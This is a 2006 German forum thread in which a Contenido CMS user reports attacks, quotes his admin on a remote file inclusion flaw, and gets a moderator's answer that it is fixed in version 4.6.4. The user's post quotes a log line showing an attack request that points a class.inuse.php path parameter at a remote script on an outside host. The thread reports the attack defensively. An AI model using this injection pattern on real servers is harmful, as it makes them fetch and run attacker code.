Angriffe von Brasillianern auf Contenido (auch bei 4.6.4)

Doljaka · Beitrag von **Doljaka** » Mo 23. Jan 2006, 14:18

Hallo,
habe gerade von meinem Netzwerkadmin erfahren, dass weiterhin Angriffe auf das Contenido System möglich sind.

**********************************************************
Nachricht meines Admins:
also nochma zu dem contenido problem. wir hatten diesmla sogar nen xdcc server auf web laufen.....
das problem besteht darin das contenido nicht prüft wo die scripte liegen die es ausführt.
das scheint kein problem zu sein was gepatcht wird, sondern ein generelles von contenido.
ich weiß das es da möglichkeiten gibt das zu ändern.. aber halt nicht genau wie:) gegenwärtig kann man contenido alle möglichen scripte als parameter übergeben und so halt auch sachen starten die unter dem user des webservers laufen.
*********************************************************

Hier noch ein Logeintrag:
*********************************************************
.../contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.webzenxd.kit.net/tool25.txt? ... ou_13.rmvb
HTTP/1.1" 200 111470...
*********************************************************

Gibt es bei Euch ähnliche Probleme bzw. schon Updates um derart Angriffe zu verhindern?

Bin für jeden Tip dankbar
Jan

Beitrag von **HerrB** » Mo 23. Jan 2006, 14:22

Das mit class.inuse.php sollte in V4.6.4 behoben sein, zu den anderen Sachen suche im Forum, da gibt es schon einen Beitrag.

Habe es mal unter Tips&Tricks ergänzt.

Gruß
HerrB

Doljaka · Beitrag von **Doljaka** » Mo 23. Jan 2006, 14:48

HerrB hat geschrieben:Das mit class.inuse.php sollte in V4.6.4 behoben sein, zu den anderen Sachen suche im Forum, da gibt es schon einen Beitrag.

Habe es mal unter Tips&Tricks ergänzt.

Gruß
HerrB

Alles klar. Dateien gefixt.
Vielen Dank für die schnelle Antwort